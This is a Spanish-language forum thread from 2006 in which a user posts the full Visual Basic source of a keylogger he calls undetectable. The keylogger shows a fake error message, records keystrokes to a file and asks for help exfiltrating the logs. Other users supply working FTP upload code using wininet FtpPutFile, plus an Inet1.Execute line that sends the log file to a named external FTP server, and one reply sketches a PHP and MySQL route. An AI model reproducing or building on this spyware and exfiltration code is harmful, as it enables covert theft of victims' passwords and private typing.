Ayuda kon Keylogger

Iniciado por cherembo, 27 Septiembre 2006, 22:10 PM

0 Miembros y 1 Visitante están viendo este tema.

cherembo

bueno, hice un keylogger, esta todo bien, es indetectable, pero necesito saber komo hago para que los datos suban a un ftp o se envien via email, les agradeceria muxo si me ayudan kon eso, por favor... gracias!!!!  :D

Red Mx

eso se me hace mas facil si tu keyloger recolecta todo en un txt luego se ejecuta la web php y envia el archivo a una base mysql en internet de ahi que la web lo envie a tu mail.


Pero bueno ahi otros metodos tambien y la pregunta que siempre les ago.


Que codigo tienes que haestigado o quieres ver quien te lo hace aqui,.
Desarrollar Malware Es Causa De Cancer...

cherembo

bueno les dejo el kodigo fuente, espero que me ayuden kon esto, eso que semenciono me gusto :)... en fin, aki les dejo la URL del keyloger, chekenlo  ;D

http://yma.acid-lounge.com/archivos/GeHeNa.rar

:rolleyes: :rolleyes: :rolleyes:

cherembo


metalflap

amigo cherembo, que tal si compartes tu codigo haciendo un Copy Paste en este foro?

gracias
Metalflap
Programando para un Mejor Futuro

cherembo

ya lo comparti... pero nadie me hizo kaso debido a ello kite el kode...  :-( :-( :-(

cherembo

pero aki va de nuevo...

Esto va en el form...

Private Sub Form_Load()
MsgBox "Error Al Ejecutar La Aplicación", 16, "Error"
GeHeNa_Texto_1 = ""
End Sub

Private Sub GeHeNa_Timer_1_Timer()
If ObtenerLaTeclaPresionada Then
GeHeNa_Texto_1.Text = GeHeNa_Texto_1.Text + Tecla_Presionada
End If
End Sub


esto va komo un modulo...

Private Declare Function EstadoDelTeclado Lib "user32" Alias "GetKeyboardState" _
(EstadoDeLaTecla As Byte) As Long
Const VK_CAPITAL = &H14
Private Declare Function EstadoDeLaTecla Lib "user32" _
Alias "GetKeyState" (ByVal nVirtKey As Long) As Integer
Private Declare Function ObtenerSiSePresionoLaTecla Lib "user32" _
Alias "GetAsyncKeyState" (ByVal vKey As Long) As Integer
Private Const Tecla_Shift As Integer = 16
Private Buscar_Tecla As Integer
Private Resultado_Tecla As Long
Private bShift As Boolean
Public Tecla_Presionada As String

Public Function ObtenerLaTeclaPresionada() As Boolean
Buscar_Tecla = 65
Do Until Buscar_Tecla = 91
Resultado_Tecla = ObtenerSiSePresionoLaTecla(Buscar_Tecla)
If Resultado_Tecla = -32767 Then
Resultado_Tecla = EstadoDeLaTecla(Tecla_Shift)
Tecla_Presionada = IIf(Resultado_Tecla < 0, Chr(Buscar_Tecla), LCase(Chr(Buscar_Tecla)))
Dim Estado As Boolean
Call CapsLock_rm(Estado)
If Estado = True Then
Tecla_Presionada = UCase(Tecla_Presionada)
End If
GoTo TeclaEncontrada
End If
Buscar_Tecla = Buscar_Tecla + 1
Loop
Buscar_Tecla = 48
Do Until Buscar_Tecla = 57
Resultado_Tecla = ObtenerSiSePresionoLaTecla(Buscar_Tecla)
If Resultado_Tecla = -32767 Then
Resultado_Tecla = EstadoDeLaTecla(Tecla_Shift)
If Resultado_Tecla < 0 Then
If Buscar_Tecla = 48 Then Tecla_Presionada = "="
If Buscar_Tecla = 49 Then Tecla_Presionada = "!"
If Buscar_Tecla = 50 Then Tecla_Presionada = "'"
If Buscar_Tecla = 51 Then Tecla_Presionada = "#"
If Buscar_Tecla = 52 Then Tecla_Presionada = "$"
If Buscar_Tecla = 53 Then Tecla_Presionada = "%"
If Buscar_Tecla = 54 Then Tecla_Presionada = "^"
If Buscar_Tecla = 55 Then Tecla_Presionada = "&"
If Buscar_Tecla = 56 Then Tecla_Presionada = "*"
If Buscar_Tecla = 58 Then Tecla_Presionada = "("
Else
Tecla_Presionada = Chr(Buscar_Tecla)
End If
GoTo TeclaEncontrada
End If
Buscar_Tecla = Buscar_Tecla + 1
Loop
Resultado_Tecla = ObtenerSiSePresionoLaTecla(13)
If Resultado_Tecla = -32767 Then
Tecla_Presionada = vbCrLf
Open App.Path & "\" & "GeHeNa.txt" For Append As #1
Write #1, GeHeNa.GeHeNa_Texto_1.Text
Close #1
GeHeNa.GeHeNa_Texto_1.Text = ""
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(32)
If Resultado_Tecla = -32767 Then
Tecla_Presionada = " "
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(8)
If Resultado_Tecla = -32767 Then
Tecla_Presionada = " BKSP "
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(46)
If Resultado_Tecla = -32767 Then
Tecla_Presionada = " DEL "
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(190)
If Resultado_Tecla = -32767 Then
Resultado_Tecla = EstadoDeLaTecla(Tecla_Shift)
Tecla_Presionada = IIf(Resultado_Tecla < 0, ">", ".")
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(188)
If Resultado_Tecla = -32767 Then
Resultado_Tecla = EstadoDeLaTecla(Tecla_Shift)
Tecla_Presionada = IIf(Resultado_Tecla < 0, "<", ",")
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(186)
If Resultado_Tecla = -32767 Then
Resultado_Tecla = EstadoDeLaTecla(Tecla_Shift)
Tecla_Presionada = IIf(Resultado_Tecla < 0, ":", ";")
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(191)
If Resultado_Tecla = -32767 Then
Resultado_Tecla = EstadoDeLaTecla(Tecla_Shift)
Tecla_Presionada = IIf(Resultado_Tecla < 0, "?", "/")
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(222)
If Resultado_Tecla = -32767 Then
Resultado_Tecla = EstadoDeLaTecla(Tecla_Shift)
Tecla_Presionada = IIf(Resultado_Tecla < 0, """", "'")
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(192)
If Resultado_Tecla = -32767 Then
Resultado_Tecla = EstadoDeLaTecla(Tecla_Shift)
Tecla_Presionada = IIf(Resultado_Tecla < 0, "~", "`")
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(189)
If Resultado_Tecla = -32767 Then
Resultado_Tecla = EstadoDeLaTecla(Tecla_Shift)
Tecla_Presionada = IIf(Resultado_Tecla < 0, "_", "-")
GoTo TeclaEncontrada
End If
Resultado_Tecla = ObtenerSiSePresionoLaTecla(187)
If Resultado_Tecla = -32767 Then
Resultado_Tecla = EstadoDeLaTecla(Tecla_Shift)
Tecla_Presionada = IIf(Resultado_Tecla < 0, "+", "=")
GoTo TeclaEncontrada
End If
ObtenerLaTeclaPresionada = False
Exit Function
TeclaEncontrada:
ObtenerLaTeclaPresionada = True
End Function

Public Sub CapsLock_rm(Estado As Boolean)
Dim EstadodelCapsLock As Boolean
Dim teclas(0 To 255) As Byte
EstadoDelTeclado teclas(0)
EstadodelCapsLock = teclas(VK_CAPITAL)
If EstadodelCapsLock <> True Then
Estado = False
ElseIf EstadodelCapsLock <> False Then
Estado = True
End If
End Sub

cherembo

ven.. despues de 1 dia... nada jajaja... a ver kuando alguien me ayuda!!!!  :huh: :huh: :huh: :huh:

SheKeL_C$

#8
Esta es la ayuda q da el api-guide:

Const FTP_TRANSFER_TYPE_UNKNOWN = &H0
Const FTP_TRANSFER_TYPE_ASCII = &H1
Const FTP_TRANSFER_TYPE_BINARY = &H2
Const INTERNET_DEFAULT_FTP_PORT = 21               ' default for FTP servers
Const INTERNET_SERVICE_FTP = 1
Const INTERNET_FLAG_PASSIVE = &H8000000            ' used for FTP connections
Const INTERNET_OPEN_TYPE_PRECONFIG = 0                    ' use registry configuration
Const INTERNET_OPEN_TYPE_DIRECT = 1                        ' direct to net
Const INTERNET_OPEN_TYPE_PROXY = 3                         ' via named proxy
Const INTERNET_OPEN_TYPE_PRECONFIG_WITH_NO_AUTOPROXY = 4   ' prevent using java/script/INS
Const MAX_PATH = 260
Private Type FILETIME
    dwLowDateTime As Long
    dwHighDateTime As Long
End Type
Private Type WIN32_FIND_DATA
    dwFileAttributes As Long
    ftCreationTime As FILETIME
    ftLastAccessTime As FILETIME
    ftLastWriteTime As FILETIME
    nFileSizeHigh As Long
    nFileSizeLow As Long
    dwReserved0 As Long
    dwReserved1 As Long
    cFileName As String * MAX_PATH
    cAlternate As String * 14
End Type
Private Declare Function InternetCloseHandle Lib "wininet.dll" (ByVal hInet As Long) As Integer
Private Declare Function InternetConnect Lib "wininet.dll" Alias "InternetConnectA" (ByVal hInternetSession As Long, ByVal sServerName As String, ByVal nServerPort As Integer, ByVal sUserName As String, ByVal sPassword As String, ByVal lService As Long, ByVal lFlags As Long, ByVal lContext As Long) As Long
Private Declare Function InternetOpen Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Private Declare Function FtpSetCurrentDirectory Lib "wininet.dll" Alias "FtpSetCurrentDirectoryA" (ByVal hFtpSession As Long, ByVal lpszDirectory As String) As Boolean
Private Declare Function FtpGetCurrentDirectory Lib "wininet.dll" Alias "FtpGetCurrentDirectoryA" (ByVal hFtpSession As Long, ByVal lpszCurrentDirectory As String, lpdwCurrentDirectory As Long) As Long
Private Declare Function FtpCreateDirectory Lib "wininet.dll" Alias "FtpCreateDirectoryA" (ByVal hFtpSession As Long, ByVal lpszDirectory As String) As Boolean
Private Declare Function FtpRemoveDirectory Lib "wininet.dll" Alias "FtpRemoveDirectoryA" (ByVal hFtpSession As Long, ByVal lpszDirectory As String) As Boolean
Private Declare Function FtpDeleteFile Lib "wininet.dll" Alias "FtpDeleteFileA" (ByVal hFtpSession As Long, ByVal lpszFileName As String) As Boolean
Private Declare Function FtpRenameFile Lib "wininet.dll" Alias "FtpRenameFileA" (ByVal hFtpSession As Long, ByVal lpszExisting As String, ByVal lpszNew As String) As Boolean
Private Declare Function FtpGetFile Lib "wininet.dll" Alias "FtpGetFileA" (ByVal hConnect As Long, ByVal lpszRemoteFile As String, ByVal lpszNewFile As String, ByVal fFailIfExists As Long, ByVal dwFlagsAndAttributes As Long, ByVal dwFlags As Long, ByRef dwContext As Long) As Boolean
Private Declare Function FtpPutFile Lib "wininet.dll" Alias "FtpPutFileA" (ByVal hConnect As Long, ByVal lpszLocalFile As String, ByVal lpszNewRemoteFile As String, ByVal dwFlags As Long, ByVal dwContext As Long) As Boolean
Private Declare Function InternetGetLastResponseInfo Lib "wininet.dll" Alias "InternetGetLastResponseInfoA" (lpdwError As Long, ByVal lpszBuffer As String, lpdwBufferLength As Long) As Boolean
Private Declare Function FtpFindFirstFile Lib "wininet.dll" Alias "FtpFindFirstFileA" (ByVal hFtpSession As Long, ByVal lpszSearchFile As String, lpFindFileData As WIN32_FIND_DATA, ByVal dwFlags As Long, ByVal dwContent As Long) As Long
Private Declare Function InternetFindNextFile Lib "wininet.dll" Alias "InternetFindNextFileA" (ByVal hFind As Long, lpvFindData As WIN32_FIND_DATA) As Long
Const PassiveConnection As Boolean = True

Private Sub Form_Load()
    Dim hConnection As Long, hOpen As Long, sOrgPath  As String
    hOpen = InternetOpen("API-Guide sample program", INTERNET_OPEN_TYPE_PRECONFIG, vbNullString, vbNullString, 0)
    hConnection = InternetConnect(hOpen, "el host del ftp", INTERNET_DEFAULT_FTP_PORT, "user", "pass", INTERNET_SERVICE_FTP, IIf(PassiveConnection, INTERNET_FLAG_PASSIVE, 0), 0)
    sOrgPath = String(MAX_PATH, 0)
    FtpPutFile hConnection, "{ruta del archivo local. PE : C:\a.txt}", "{Nombre cuando este en el server PE : a.txt", FTP_TRANSFER_TYPE_UNKNOWN, 0
    InternetCloseHandle hConnection
    InternetCloseHandle hOpen
End Sub


Salu2




Ahora q m fijo ay algunas apis q no se utilizan pero tmpoco importa  :rolleyes:

ubetor^^

Yo lo hice mediante el control llamado "Microsoft Internet Tranfer Control". Este code lo que hace es enviar un .txt a un servidor FTP.

Inet1.Execute "ftp://user:password@ftp.usuarios.lycos.es", "PUT archivo a enviar.txt" & ".txt"

El .txt tiene que tener el mismo nombre que aparece en el code (en este caso "archivo a enviar.txt".

salu2